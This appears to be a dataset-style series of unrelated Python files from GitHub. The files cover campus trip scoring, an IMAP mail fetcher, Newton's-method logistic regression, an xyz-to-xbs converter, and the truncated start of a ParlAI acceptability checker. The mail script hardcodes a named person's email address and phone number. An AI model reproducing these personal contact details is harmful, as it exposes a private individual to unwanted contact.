        """Flatten the route into "lat,lng,lat,lng,..." (keeps trailing comma).

        Uses str.join instead of the old quadratic ``+=`` concatenation.
        """
        return "".join("%s,%s," % (p[0], p[1]) for p in self.points)

    def make_for_browser(self):
        """Semicolon-separated summary string consumed by the web frontend."""
        return '%s;%s;%s;%s;%s;%s' % (self.beauty, self.time, self.social, self.sweat, self.time_duration, self.make_points())

    def make_jsn(self):
        """JSON object with the individual scores, duration and raw points."""
        return json.dumps({"time" : self.time, "beauty" : self.beauty, "social" : self.social, "sweat" : self.sweat, "duration" : self.time_duration, "points" : self.points})

    def make_json(self):
        """JSON-encoded form of the browser summary string."""
        return json.dumps(self.make_for_browser())

    def __repr__(self):
        return "total score : %f || source : %s || beauty : %f || sweat : %f || time : %f || social : %f" % (self.tot_score, self.source, self.beauty, self.sweat, self.time, self.social)

    def __eq__(self, other):
        # Trips are considered equal when they follow the same route.
        return self.make_points() == other.make_points()
class UserModel(object):
    """
    User Model class
    Can do lots of cool things

    Tracks a user's preference weights ("utilities") for time, sweat,
    scenery and social criteria, and scores candidate OTP trips by them.
    """

    def __init__(self, has_bike=False):
        self.utilities = pk.Chain()
        self.has_bike = has_bike
        self.user_base = the_base
        self.user_base.add_user(self)
        ## Initialize utilities
        self.utilities["sweat"] = 0
        self.utilities["scenery"] = 0
        self.utilities["social"] = 0
        self.utilities["time"] = 0

    def get_top_choice_places(self, start_place, end_place):
        """Geocode two place names and return the top trips between them."""
        start = self.user_base.geocode_with_cache(start_place)
        end = self.user_base.geocode_with_cache(end_place)
        return self.get_top_choices_lat_lng(start, end)

    def get_all_trips(self, start, end, curr_time=None):
        """Query OTP for all candidate trips from *start* to *end*."""
        if curr_time is None:
            curr_time = datetime.datetime.now()
        curr_month = curr_time.month
        curr_year = curr_time.year
        curr_minute = curr_time.minute
        curr_day = curr_time.day
        curr_hour = curr_time.hour
        mode = "WALK"
        if self.has_bike:
            mode = "BICYCLE"
        # BUG FIX: os.environ is a mapping, not a callable --
        # os.environ("OTP_SERVER") raised TypeError at runtime.
        # NOTE(review): `mode` is computed above but "WALK" is still
        # hard-coded in the route call; confirm whether BICYCLE routing
        # was intended before changing that.
        walk_otp = otp.OTP(os.environ["OTP_SERVER"]).route(start, end, "WALK", write_day(curr_month, curr_day, curr_year), write_time(curr_hour, curr_minute), False)
        lst_of_trips = walk_otp.get_all_trips(0, 0, 0)
        tot_trips = lst_of_trips
        return tot_trips

    def get_top_choices_lat_lng(self, start, end, curr_time=None, tot_trips=None):
        """Score all candidate trips and return the N_TOP_TRIPS best ones.

        Passing *tot_trips* skips the OTP query (used by tests).
        """
        testing = True
        if tot_trips is None:
            tot_trips = self.get_all_trips(start, end, curr_time)
            testing = False
        scores = [ ]
        times = get_normalized_times(tot_trips)
        beauty = get_normalized_beauty(tot_trips)
        sweat = get_normalized_sweat(tot_trips, testing=testing)
        for i in range(len(times)):
            scores.append(self.get_score_for_trip(tot_trips[i], times[i], beauty[i], sweat[i]))
        top = self.get_top_n(scores, N_TOP_TRIPS)
        return top

    def get_score_for_trip(self, trip, time, beauty, sweat):
        """Combine normalized criteria into a CampusTrip using the utilities.

        Time and sweat are costs (negative weight); beauty and crowd are
        benefits (positive weight).
        """
        crowd_score = 0
        lst_of_points = get_route(trip)
        for crowd in self.user_base.crowd_areas.values():
            crowd.update_times(trip.start_time)
            crowd_score += crowd.get_crowd()
        final_time = -(time * self.utilities["time"])
        final_sweat = -sweat * self.utilities["sweat"]
        final_beauty = (self.utilities['scenery']*beauty)
        final_crowd = (self.utilities['social']*crowd_score)
        final_score_tuple = (final_time, final_sweat, final_beauty, final_crowd)
        print("final_score_tuple : %s" % str(final_score_tuple))
        return CampusTrip(final_score_tuple, get_time_of_trip(trip), lst_of_points, "source")

    def get_top_n(self, lst_of_trips, n):
        """Return the *n* trips with the highest total score."""
        return heapq.nlargest(n, lst_of_trips, key=lambda v: v.tot_score)

    def increment_utility(self, which):
        """Bump the weight of one criterion by 1."""
        self.utilities[which] += 1

    def increase_utility_by_n(self, which, n):
        """Bump the weight of one criterion by *n*."""
        self.utilities[which] += n

    def normalize_utilities(self):
        """Rescale the utility weights to sum to 1."""
        self.utilities.normalize()

    def save_to_db(self):
        """Persist the utilities to the database.

        NOTE(review): references ``self.name`` which is never assigned in
        this class -- confirm before relying on this method.
        """
        db = edb.get_utility_model_db()
        db.insert({"utilities" : self.utilities, "name" : self.name})

    def delta(self, start, end):
        """
        Returns true if anything has changed and we should call google maps...
        Otherwise no.
        """
        if "start" not in self.user_base.last_info or "end" not in self.user_base.last_info or "utilities" not in self.user_base.last_info:
            #print "first delta"
            return True
        return not (start == self.user_base.last_info["start"] and end == self.user_base.last_info["end"] and self.utilities == self.user_base.last_info["utilities"])

    def add_to_last(self, start, end):
        """Memoize the current query so delta() can detect changes."""
        self.user_base.last_info["utilities"] = self.utilities.copy()
        self.user_base.last_info["start"] = start
        self.user_base.last_info["end"] = end
def normalize_noises(noise_areas):
    """Normalize every area's sound levels in place; return them in a new list."""
    normalized = []
    for sound_area in noise_areas:
        sound_area.normalize_sounds()
        normalized.append(sound_area)
    return normalized
def get_time_of_trip(trip):
    """Return the trip duration as whole seconds (``timedelta.seconds``)."""
    duration = trip.end_time - trip.start_time
    return duration.seconds
def get_normalized_times(lst_of_trips):
    """Return each trip's duration rescaled so the values sum to 1.

    A pykov Vector is used purely for its ``normalize`` helper.
    """
    counter = pk.Vector()
    i = 0
    for trip in lst_of_trips:
        counter[i] = get_time_of_trip(trip)
        i += 1
    counter.normalize()
    to_return = []
    for i in range(len(lst_of_trips)):
        to_return.append(counter[i])
    return to_return
def get_sweat_factor(trip, testing=False):
    """Estimate exertion from elevation change via a linear fit.

    NOTE(review): ``get_elevation_change`` is currently a stub returning
    None, so ``chng[0]`` raises TypeError -- this function is broken
    until that helper is re-implemented.
    """
    chng = get_elevation_change(trip, testing)
    print("chng : %s" % str(chng))
    return 71.112*chng[0] + 148.09
def get_normalized_sweat(lst_of_trips, testing=False):
    """Return each trip's sweat factor rescaled so the values sum to 1."""
    counter = pk.Vector()
    i = 0
    for trip in lst_of_trips:
        factor = get_sweat_factor(trip, testing)
        print("sweat_factor : %s" % factor)
        counter[i] = factor
        i += 1
    counter.normalize()
    to_return = []
    for i in range(len(lst_of_trips)):
        to_return.append(counter[i])
    return to_return
def get_normalized_beauty(lst_of_trips):
    """Return each trip's beauty score rescaled so the values sum to 1."""
    counter = pk.Vector()
    i = 0
    for trip in lst_of_trips:
        factor = get_beauty_score_of_trip(trip)
        print("beauty_factor : %s" % factor)
        counter[i] = factor
        i += 1
    counter.normalize()
    to_return = []
    for i in range(len(lst_of_trips)):
        to_return.append(counter[i])
    return to_return
class Area(object):
    """ Area class

    A named rectangular campus region. ``bounding_box`` is
    (top-left, bottom-right) as (lat, lon) pairs. ``times`` holds recent
    visit timestamps used as a crowd proxy; ``beauty`` and
    ``time_to_noise`` are optional per-area scores.
    """

    def __init__(self, name, tl, br, beauty=None, time_to_noise=None):
        self.name = name
        self.bounding_box = (tl, br)
        self.beauty = beauty
        self.time_to_noise = time_to_noise
        self.times = set()

    def point_in_area(self, lat, lng):
        """Return True when (lat, lng) falls inside this area's box."""
        return in_bounding_box(lat, lng, self.bounding_box)

    def add_time(self, time):
        """Record a visit timestamp."""
        self.times.add(time)

    def get_crowd(self):
        """Crowd estimate: the number of recorded visit times."""
        return len(self.times)

    def update_times(self, time_by):
        """Drop every recorded time earlier than *time_by*.

        BUG FIX: the old code removed elements from ``self.times`` while
        iterating it, which raises ``RuntimeError: Set changed size
        during iteration``; rebuild the set instead.
        """
        self.times = {t for t in self.times if t >= time_by}

    def update_to_now(self):
        """Drop every recorded time earlier than the current moment."""
        self.update_times(datetime.datetime.now())

    def normalize_sounds(self):
        """Rescale time_to_noise so the values sum to 1 (pykov Vector)."""
        counter = pk.Vector()
        for k,v in self.time_to_noise.items():
            counter[k] = v
        counter.normalize()
        self.time_to_noise = counter

    def __repr__(self):
        return "beauty : %s" % (self.beauty)
def in_bounding_box(lat, lon, bounding_box):
    """True when (lat, lon) lies inside ((top-left), (bottom-right))."""
    (top_lat, left_lon), (bottom_lat, right_lon) = bounding_box
    return bottom_lat <= lat <= top_lat and left_lon <= lon <= right_lon
def parse_noise():
    """Parse noise_data.csv into four campus Areas with time->noise maps.

    Each CSV row holds readings for (sproul, glade, wellmen, leconte);
    successive rows are 10 minutes apart starting at 06:00.
    """
    sproul_noises, glade_noises, wellmen_noises, leconte_noises = {}, {}, {}, {}
    sproul_tl, sproul_br = (37.870637,-122.259722), (37.868926,-122.259005)
    glade_tl, glade_br = (37.87359,-122.260098), (37.872707,-122.258687)
    wellmen_tl, wellmen_br = (37.873045,-122.263377), (37.872501,-122.261803)
    lecont_tl, lecont_br = (37.873278,-122.256959), (37.872277,-122.25639)
    time = datetime.datetime(2040, 10, 10, 6, 0, 0)
    td = datetime.timedelta(minutes=10)
    # Context manager closes the file (the old code leaked the handle).
    with open("emission/user_model_josh/noise_data.csv") as noise_file:
        for l in noise_file:
            l = l.split(',')
            sproul_noises[time] = float(l[0])
            glade_noises[time] = float(l[1])
            wellmen_noises[time] = float(l[2])
            leconte_noises[time] = float(l[3])
            # BUG FIX: the timestamp was never advanced, so every row
            # overwrote the same 06:00 key; step 10 minutes per row.
            time += td
    sproul = Area("sproul", sproul_tl, sproul_br, time_to_noise=sproul_noises)
    glade = Area("glade", glade_tl, glade_br, time_to_noise=glade_noises)
    wellmen = Area("wellmen", wellmen_tl, wellmen_br, time_to_noise=wellmen_noises)
    leconte = Area("leconte", lecont_tl, lecont_br, time_to_noise=leconte_noises)
    return [sproul, glade, wellmen, leconte]
def parse_beauty():
    """Parse beauty.csv into a list of Areas with beauty ratings.

    Columns used: 0=name, 1-2=top-left lat/lon, 5-6=bottom-right
    lat/lon, 9=integer beauty score.
    """
    beauty_areas = [ ]
    # Context manager closes the file (the old code leaked the handle).
    with open("emission/user_model_josh/beauty.csv") as beauty_file:
        for beauty_line in beauty_file:
            beauty_line = beauty_line.split(',')
            name = beauty_line[0]
            tl = (float(beauty_line[1]), float(beauty_line[2]))
            br = (float(beauty_line[5]), float(beauty_line[6]))
            beauty = int(beauty_line[9])
            beauty_areas.append(Area(name, tl, br, beauty=beauty))
    return beauty_areas
def get_noise_score(lat, lng, noises, time):
    """Return the noise level at (lat, lng) around *time*.

    Sums the nearest reading of every area containing the point; points
    outside all mapped areas (or with no reading) get 0.5 as a neutral
    default. (Removed an unused ``tot`` accumulator.)
    """
    to_return = 0
    for noise_area in noises:
        if noise_area.point_in_area(lat, lng):
            to_return += get_closest(time, noise_area)
    if to_return > 0:
        return to_return
    return .5 ## if point isnt in any mapped area return the average
def get_closest(time, area):
    """Return the first noise reading within 10 minutes of *time*, else 0.

    NOTE(review): ``time - k`` is a signed timedelta, so any reading
    *later* than ``time`` also satisfies the ``< 10 minutes`` test
    (negative deltas compare small) -- probably an absolute difference
    was intended; confirm before changing.
    """
    for k, v in area.time_to_noise.items():
        if time - k < datetime.timedelta(minutes=10):
            return v
    return 0
def get_beauty_score(lat, lng, beauties):
    """Beauty rating at (lat, lng); average of all areas when unmapped."""
    running_total = 0
    for beauty_area in beauties:
        running_total += beauty_area.beauty
        if beauty_area.point_in_area(lat, lng):
            return beauty_area.beauty
    # Point is outside every mapped area: fall back to the mean rating.
    return float(running_total) / float(len(beauties))
def get_beauty_score_of_trip(trip):
    """Average beauty score over every point of *trip*."""
    beauties = parse_beauty()
    beauty_score = 0
    tot_points = 0
    for section in trip.sections:
        for point in section.points:
            tot_points += 1
            beauty_score += get_beauty_score(point.get_lat(), point.get_lon(), beauties)
    return old_div(float(beauty_score), float(tot_points))
def get_noise_score_of_trip(trip):
    """Average noise score over every point of *trip*.

    BUG FIX: the old body never initialized ``tot_points``, returned an
    undefined ``beauty_score`` (copy-paste from the beauty version), and
    dropped the ``time`` argument that ``get_noise_score`` requires.
    """
    noises = parse_noise()
    noise_score = 0
    tot_points = 0
    for section in trip.sections:
        for point in section.points:
            tot_points += 1
            # assumes trip.start_time approximates each point's time -- TODO confirm
            noise_score += get_noise_score(
                point.get_lat(), point.get_lon(), noises, trip.start_time
            )
    return float(noise_score) / float(tot_points)
def get_route_dict(trip):
    """Convert a sequence of (lat, lng) pairs into lat/lng dicts."""
    return [{'lat': pt[0], 'lng': pt[1]} for pt in trip]
def get_route(trip):
    """Return the trip as (lat, lng) tuples: start, every other interior
    point (downsampled across all sections), then the end location."""
    route = [(trip.trip_start_location.get_lat(), trip.trip_start_location.get_lon())]
    idx = 0
    for section in trip.sections:
        for point in section.points:
            # Keep only every second point to thin out the route.
            if idx % 2 == 0:
                route.append((point.get_lat(), point.get_lon()))
            idx += 1
    route.append((trip.trip_end_location.get_lat(), trip.trip_end_location.get_lon()))
    return route
def write_day(month, day, year):
    """Format an OTP date string as month-day-year."""
    return f"{month}-{day}-{year}"
def write_time(hour, minute):
    """Format an OTP time string as hour:minute (no zero padding)."""
    return f"{hour}:{minute}"
def get_one_random_point_in_radius(crd, radius):
    """Return a uniformly random Coordinate within *radius* km of *crd*.

    Based on https://gis.stackexchange.com/questions/25877; the sqrt on
    the radial term keeps the distribution uniform over the disk.
    """
    radius_in_degrees = kilometers_to_degrees(radius)
    x_0 = crd.get_lon()
    y_0 = crd.get_lat()
    u = random.random()
    v = random.random()
    w = radius_in_degrees * math.sqrt(u)
    t = 2 * math.pi * v
    x = w * math.cos(t)
    y = w * math.sin(t)
    # BUG FIX: math.cos expects radians; the latitude was being passed
    # in degrees, making the Earth-curvature correction meaningless.
    x = x / math.cos(math.radians(y_0))  # To account for Earth curvature stuff
    to_return = to.Coordinate(y + y_0, x + x_0)
    return to_return
def kilometers_to_degrees(km):
    """Convert kilometers to degrees of arc (Earth circumference ~40,000 km).

    Plain true division replaces the redundant ``old_div`` shim -- the
    module already does ``from __future__ import division``.
    """
    ## From stackexchnage mentioned above
    return float(km) / 40000.0 * 360
def str_time_to_datetme(str_time):
    """Parse "HH:MM[:...]" into a datetime on the fixed date 2040-10-10."""
    parts = str_time.split(":")
    hour, minute = int(parts[0]), int(parts[1])
    return datetime.datetime(2040, 10, 10, hour, minute, 0)
def make_user_from_jsn(jsn, base):
    """Build a UserModel plus geocoded endpoints and timing info from the
    'userData' stream of a Computer object in *jsn*.

    The value line is ';'-separated; fields used below:
    [0] start address, [1] end address,
    [2] timing mode ('leaveNow' / 'leaveAt' / 'thereBy'),
    [3] 'HH:MM' time (used for 'leaveAt' / 'thereBy'),
    [4] mode string passed to get_bike_info ('walk' => no bike),
    [5..8] integer utility weights for time / sweat / scenery / social.

    Returns a dict with keys 'user', 'start', 'end', 'time_info'.
    """
    value_line = jsn["objects"]["Computer"]["streams"]["userData"]["points"][0]["value"]
    value_line = value_line.split(";")
    start = value_line[0]
    end = value_line[1]
    # Geocode both endpoint addresses (base caches lookups).
    start = base.geocode_with_cache(start)
    end = base.geocode_with_cache(end)
    time_info = {}
    print(value_line)
    if value_line[2] == "leaveNow":
        time_info["leave"] = True
        time_info["when"] = datetime.datetime.now()
        print("leaveNow")
    elif value_line[2] == "leaveAt":
        time_info["leave"] = True
        time_info["when"] = str_time_to_datetme(value_line[3])
        print("leaveAt")
    elif value_line[2] == "thereBy":
        # 'leave' False means the time is an arrival deadline, not a departure.
        time_info["leave"] = False
        time_info["when"] = str_time_to_datetme(value_line[3])
        print("arriveAt")
    bike = get_bike_info(value_line[4])
    user = UserModel(bike)
    user.increase_utility_by_n("time", int(value_line[5]))
    user.increase_utility_by_n("sweat", int(value_line[6]))
    user.increase_utility_by_n("scenery", int(value_line[7]))
    user.increase_utility_by_n("social", int(value_line[8]))
    user.utilities.normalize()
    print("utilities : %s" % user.utilities)
    return {"user" : user, "start" : start, "end" : end, "time_info" : time_info}
def get_bike_info(bike_str):
    """Return True when the mode string indicates biking; False for 'walk'."""
    return bike_str != "walk"
def get_elevation_change(trip, testing=False):
    """Stub — not implemented; always returns None."""
    # TODO: re-implement using the open elevation API
    pass
# Script entry point: run main() only when executed directly, not on import.
if __name__ == "__main__":
    main()
| e-mission/e-mission-server | emission/analysis/modelling/user_model_josh/utility_model.py | utility_model.py | py | 16,233 | python | en | code | 22 | github-code | 36 |
12835968022 | import time
from itertools import chain
import email
import imaplib
import smtplib
from readair import Log
# --- Account and search configuration ----------------------------------
MY_NAME="Nile Walker"
MY_ADDRESS = 'nilezwalker@gmail.com'
# Prompted interactively so the password is never stored in the source.
PASSWORD = input('Enter the password for {}\n'.format(MY_ADDRESS))
MY_NUMBER='410-805-0012'
SUBJECT="Google Housing Request"
SERVER_ADDRESS="smtp.gmail.com"
PORT=587
# Restrict mail search. Be very specific.
# Machine should be very selective to receive messages.
criteria = {
    'FROM': 'yahoo@antonakis.co.uk',
    #S'SUBJECT': 'SPECIAL SUBJECT LINE',
    #'BODY': 'SECRET SIGNATURE',
}
# Highest message UID processed so far (used by the commented polling loop below).
uid_max = 0
def getBody(b):
    """Return the decoded payload bytes of message *b*.

    For multipart messages, returns the first text/plain part that is not
    an attachment; returns "" if no such part exists.
    """
    if not b.is_multipart():
        return b.get_payload(decode=True)
    for part in b.walk():
        is_plain_text = part.get_content_type() == 'text/plain'
        disposition = str(part.get('Content-Disposition'))
        if is_plain_text and 'attachment' not in disposition:
            return part.get_payload(decode=True)
    return ""
def get_first_text_block(msg):
    """Return the (undecoded) payload of the first 'text' part of *msg*.

    Returns None for non-text, non-multipart messages, or for multipart
    messages that contain no text part.
    """
    maintype = msg.get_content_maintype()
    if maintype == 'text':
        return msg.get_payload()
    if maintype == 'multipart':
        for part in msg.get_payload():
            if part.get_content_maintype() == 'text':
                return part.get_payload()
# One-shot fetch: log in, pull every message from the configured sender,
# extract the plain-text body, strip carriage returns, and hand it to Log().
mail = imaplib.IMAP4_SSL(SERVER_ADDRESS)
mail.login(MY_ADDRESS,PASSWORD)
mail.select('INBOX')
typ, data = mail.search(None, '(FROM "yahoo@antonakis.co.uk")')
mail_ids = data[0]
id_list = mail_ids.split()
for email_id in id_list:
    result, data = mail.fetch(email_id, "(RFC822)") # fetch the email body (RFC822) for the given ID
    msg=email.message_from_bytes(data[0][1])
    body = getBody(msg)
    body = body.decode("utf-8")
    body = "".join(body.split('\r'))
    Log(body)
mail.logout()
# The string below is dead code: an earlier polling loop kept as reference.
"""
# Keep checking messages ...
# I don't like using IDLE because Yahoo does not support it.
while 1:
    # Have to login/logout each time because that's the only way to get fresh results.
    server = imaplib.IMAP4_SSL(SERVER_ADDRESS)
    server.login(MY_ADDRESS,PASSWORD)
    server.select('INBOX')
    result, data = server.uid('search', None, search_string(uid_max, criteria))
    uids = [int(s) for s in data[0].split()]
    for uid in uids:
        # Have to check again because Gmail sometimes does not obey UID criterion.
        if uid > uid_max:
            result, data = server.uid('fetch', uid, '(RFC822)')  # fetch entire message
            msg = email.message_from_string(data[0][1])
            uid_max = uid
            text = get_first_text_block(msg)
            print('New message :::::::::::::::::::::')
            print(text)
    server.logout()
    time.sleep(5*60)"""
| NWalker4483/FlightRegister | main.py | main.py | py | 2,831 | python | en | code | 0 | github-code | 36 |
40306764598 | import numpy as np
import pandas as pd
from collections import OrderedDict
def loss(h, y):
    """Mean binary cross-entropy between predictions *h* and labels *y*.

    Bug fix: the second term previously used ``np.log(1 - y)`` instead of
    ``np.log(1 - h)`` — that is log(0) = -inf whenever y == 1 and never
    measures the prediction at all.
    """
    return (-y * np.log(h) - (1 - y) * np.log(1 - h)).mean()
def add_intercept(X):
    """Prepend a bias column of ones to the single-feature input X.

    X is reshaped into an (n, 1) column first, so only one feature plus
    the intercept term is supported.
    """
    feature_column = np.reshape(X, (-1, 1))
    bias_column = np.ones((X.shape[0], 1))
    return np.concatenate((bias_column, feature_column), axis=1)
def predict(x, w):
    """Return rounded sigmoid predictions (0.0 / 1.0) for inputs x and weights w."""
    features = add_intercept(x)
    scores = np.dot(features, w)
    return sigmoid(scores).round()
def sigmoid(x):
    """Logistic function h(x) = 1 / (1 + e^-x) of the input x."""
    return 1.0 / (np.exp(-x) + 1.0)
def check_for_convergence(beta_old, beta_new, tol=1e-3):
    """Return True when the coefficients have converged in the l-infinity
    norm, i.e. no coefficient changed by more than *tol*."""
    return bool(np.all(np.abs(beta_old - beta_new) <= tol))
def get_data():
    """Return the toy (amount_spent, send_discount) dataset as float arrays."""
    raw = OrderedDict(
        amount_spent=[50, 10, 20, 5, 95, 70, 100, 200, 0],
        send_discount=[0, 1, 1, 1, 0, 0, 0, 0, 1],
    )
    frame = pd.DataFrame.from_dict(raw)
    X = frame['amount_spent'].astype('float').values
    y = frame['send_discount'].astype('float').values
    return (X, y)
def hessian_runner(X, y, learning_rate=0.01, epochs=10000):
    """Fit logistic-regression weights with a damped Newton's method.

    Bug fix: the Hessian was previously computed as
    ``np.dot(X.T, np.dot(h, 1 - h)).dot(X)``. ``np.dot(h, 1 - h)`` is a
    scalar (the *sum* of h_i * (1 - h_i)), so every sample received the
    same weight. The correct Hessian of the logistic loss is
    X^T diag(h * (1 - h)) X / n, computed below by scaling each sample's
    row by its own h_i * (1 - h_i).
    """
    X = add_intercept(X)
    W = np.zeros(X.shape[1])
    for i in range(epochs):
        theta = np.dot(X, W)
        h = sigmoid(theta)
        gradient = np.dot(X.T, h - y) / y.size
        # X^T diag(h*(1-h)) X / n — per-sample weights, not a scalar sum.
        sample_weights = h * (1 - h)
        hessian = np.dot(X.T * sample_weights, X) / y.size
        inv_hessian = np.linalg.inv(hessian)
        W_old = W
        W = W - (learning_rate * np.dot(inv_hessian, gradient))
        if check_for_convergence(W_old, W):
            W = W_old
            print('Converged @ ', i)
            break
        if i % 1000 == 0:
            print('Running : ', i, W, W_old)
    print('test : ', predict(np.array([[15], [155], [45], [55]]), W))
def run():
    """Load the toy dataset and fit it with Newton's method."""
    X , y= get_data()
    hessian_runner(X,y)
# Script entry point: only train when executed directly.
if __name__ == "__main__":
    run()
| guruprasaad123/ml_for_life | from_scratch/logistic_regression/Newtons method/hessian.py | hessian.py | py | 2,333 | python | en | code | 4 | github-code | 36 |
5035742744 | import os
import sys
from ase import io
#color can be
# - A color is specified either as a number between 0 and 1 (gray value),
# three numbers between 0 and 1 (red, green, blue values or RGB),
# or as a color name from the file /usr/lib/X11/rgb.txt (or similar).
xbs_file = open("new_xbs.bs",'w')
xbs_str="atom {} {:.3f} {:.3f} {:.3f}"
# spec Name Radius Colour
spec_strs= ["spec Fe 0.450 0.4",
"spec C 0.450 0.7",
"spec H 0.200 0.0"]
# bonds name 1 name 2 min-length max-length radius color
bond_strs =["bonds Fe Fe 0.000 2.6 0.06 1.0",
"bonds C Fe 0.000 2.6 0.09 0.8",
"bonds C H 0.000 2.1 0.04 0.8",
"bonds Fe H 0.000 2.0 0.04 1.0"]
#various parameters that can be controlled on the command line.
param_str = "inc 1"
#read xyzfile from sys.argv
ats = io.read(sys.argv[1],index="1")
print >> xbs_file, "*FeH system Migrating Fe is Labeled C"
for symbol, pos in zip(ats.get_chemical_symbols(), ats.get_positions()):
print >> xbs_file, xbs_str.format(symbol,pos[0],pos[1],pos[2])
print >> xbs_file,""
for spec_str in spec_strs:
print >> xbs_file, spec_str
print >> xbs_file,""
for bond_str in bond_strs:
print >> xbs_file, bond_str
print >> xbs_file,""
print >> xbs_file, param_str
xbs_file.close()
| Montmorency/imeall | imeall/tbe_tools/xyz_xbs.py | xyz_xbs.py | py | 1,503 | python | en | code | 8 | github-code | 36 |
74050038184 | import numpy as np
from typing import Iterable, List
from nltk.stem import PorterStemmer
from parlai.crowdsourcing.utils.acceptability import (
AcceptabilityChecker,
normalize_answer,
)
import parlai.utils.logging as logging
# Bad persona violations
# Human-readable labels returned by bad_persona() below.
PERSONA_REPEATS_PROMPT = 'repeated the prompt text'
ASKED_WIZARD_QUESTION = 'asked wizard in the persona details'
COPIED_EXTENDED_PERSONA = 'extended persona copies the main persona'
GENERIC_EXTENDED_PERSONA = 'extended persona is generic'
QUESTION_PHRASE = 'what is your'
# Wizard knowledge violations
# Labels and threshold used by poor_knowledge_selection() below.
DEFAULT_KNOWLEDGE_OVERLAP_THRESHOLD = 0.05
POOR_SEARCH_QUERIES = 'poor search queries'
IRRELEVANT_SEARCH__QUERIES = 'irrelevant search terms'
NOT_ENOUGH_SEARCH = 'not enough selected knowledge sources'
SELECTED_SHORT_PIECES = 'short knowledge pieces selected.'
LOW_KNOWLEDGE_OVERLAP = 'low knowledge overlap'
def tokenize_text(text, stemmer, as_set=True):
    """Normalize *text* and stem each space-separated token.

    Returns a set of stems by default, or the list of stems when
    *as_set* is False.
    """
    stems = [stemmer.stem(word) for word in normalize_answer(text).split(' ')]
    return set(stems) if as_set else stems
def overlap_ratios(a: set, b: set) -> float:
    """
    Smoothed Jaccard similarity of two sets: |a ∩ b| / (|a ∪ b| + 0.001).
    """
    intersection_size = len(a & b)
    union_size = len(a | b)
    return intersection_size / (union_size + 0.001)
def is_valid_agent_chat_message(message, agent_id):
    """Truthy for a non-empty chat message sent by *agent_id* that is not
    flagged as a search query."""
    text = message.get('text')
    return (
        text
        and message.get('id') == agent_id
        and not message.get('is_search_query', False)
    )
def bad_persona(persona, stemmer):
    """
    Check for poor persona selection by apprentice.

    Returns a list of violation labels (possibly empty), or None for
    old-style personas that this checker does not handle.

    Bug fix: ``main_pers`` is lower-cased below, so the original
    ``main_pers.startswith('My favorite ')`` could never match and the
    PERSONA_REPEATS_PROMPT check was dead; the prefix comparison is now
    case-consistent. A redundant ``persona_core = main_pers`` assignment
    (immediately overwritten) was also removed.
    """
    persona_parts = persona.split('\n')
    # It is not from the persona selection ones (personas used during the pilot).
    if not (
        len(persona_parts) == 2
        or (len(persona_parts) == 3 and 'I live in ' in persona_parts[0])
    ):
        logging.warning(f'Old fashioned persona: {persona}')
        return

    # Removing the location ('I live in X') part
    if len(persona_parts) == 3:
        persona_parts = persona_parts[1:]

    main_pers, ext_pers = [p.lower() for p in persona_parts]
    violations = []

    # Bad main persona response: repeats the "My favorite ..." prompt text.
    prefix = 'my favorite '
    if main_pers.startswith(prefix):
        persona_core = main_pers[len(prefix):]
        for phrase in ('i like', 'my favorite'):
            if phrase in persona_core:
                violations.append(PERSONA_REPEATS_PROMPT)
                break

    # Extended persona that asks questions
    for phrase in (QUESTION_PHRASE,):
        if phrase in ext_pers:
            violations.append(ASKED_WIZARD_QUESTION)

    # Extended persona that mostly repeats the main persona
    main_pers_tokens = tokenize_text(main_pers, stemmer)
    ext_pers_tokens = tokenize_text(ext_pers, stemmer)
    if len(ext_pers_tokens.difference(main_pers_tokens)) < 2:
        violations.append(COPIED_EXTENDED_PERSONA)

    # Use of non-generic words in persona.
    common_phrases = ('i', 'it', 'like', 'very', 'much', 'favorite', 'is', 'am')
    tokens = [w.strip() for w in ext_pers.split(' ') if w]
    ext_useful_words = [t for t in tokens if t not in common_phrases]
    if len(tokens) > 4 and len(ext_useful_words) < 2:
        violations.append(GENERIC_EXTENDED_PERSONA)

    return violations
def poor_knowledge_selection(messages, persona, stemmer, knwldg_ovlp_thrshld):
    """
    Check for poor search and knowledge selection by wizard.

    Walks the message history, collecting the wizard's search queries and
    the knowledge sentences they selected, then returns a list of violation
    labels: repeated queries, queries disjoint from the chat history, no
    selections, very short selections, or low token overlap between the
    selected knowledge and the wizard's response.
    """
    # Collecting search and knowledge selections
    search_terms = []
    selected_knowledge = []
    # Running token set of everything said so far, seeded with the persona.
    message_history_tokens = tokenize_text(persona, stemmer)
    n_search_query_not_in_history = 0
    for msg in messages:
        if msg.get('text', None):
            message_history_tokens = message_history_tokens.union(
                tokenize_text(msg['text'], stemmer)
            )

        if msg['id'] != 'Wizard':
            continue

        selections = msg.get('task_data', {}).get('selected_text_candidates')
        # selections[0][0] appears to flag "no knowledge used" — skipped here.
        if not selections or selections[0][0]:
            continue

        search_query = msg['task_data']['search_query']
        search_terms.append(search_query)
        if message_history_tokens.isdisjoint(tokenize_text(search_query, stemmer)):
            n_search_query_not_in_history += 1

        # Collect every selected sentence across the retrieved documents
        # (doc index is offset by 1 relative to text_candidates).
        selected_parts = []
        for doc_id in range(1, len(selections)):
            doc_selections = selections[doc_id]
            for sentence_id in range(len(doc_selections)):
                if doc_selections[sentence_id]:
                    selected_parts.append(
                        msg['task_data']['text_candidates'][doc_id - 1]['content'][
                            sentence_id
                        ]
                    )
        selected_knowledge.append(
            {'text': msg['text'], 'knowledge': ' '.join(selected_parts)}
        )

    knowledge_length = []
    knowledge_overlaps = []
    for knwldg in selected_knowledge:
        knowledge_tokens = tokenize_text(knwldg['knowledge'], stemmer)
        knowledge_length.append(len(knowledge_tokens))
        response_tokens = tokenize_text(knwldg['text'], stemmer)
        knowledge_overlaps.append(overlap_ratios(knowledge_tokens, response_tokens))

    violations = []

    # Repeated the same search queries
    if len(search_terms) - len(set(search_terms)) > 3:
        violations.append(POOR_SEARCH_QUERIES)

    # Search doesn't have overlap with message history
    if n_search_query_not_in_history > 2:
        violations.append(IRRELEVANT_SEARCH__QUERIES)

    # No selection
    if not knowledge_length:
        violations.append(NOT_ENOUGH_SEARCH)

    # Only selecting short sentences
    # NOTE(review): np.average of an empty list is nan (with a warning);
    # nan < 5 is False so the check is silently skipped — confirm intended.
    if np.average(knowledge_length) < 5:
        violations.append(SELECTED_SHORT_PIECES)

    # Small overlap between response and the selected knowledge parts
    knowledge_overlap_avg = np.average(knowledge_overlaps)
    if knowledge_overlap_avg < knwldg_ovlp_thrshld:
        violations.append(f'{LOW_KNOWLEDGE_OVERLAP} ({knowledge_overlap_avg})')

    return violations
class WizardOfInternetAcceptabilityChecker(AcceptabilityChecker):
    """
    ParlAI general acceptabilty checker customized for the wizard of internet.

    Extends the base chat checks with role-specific ones: persona quality
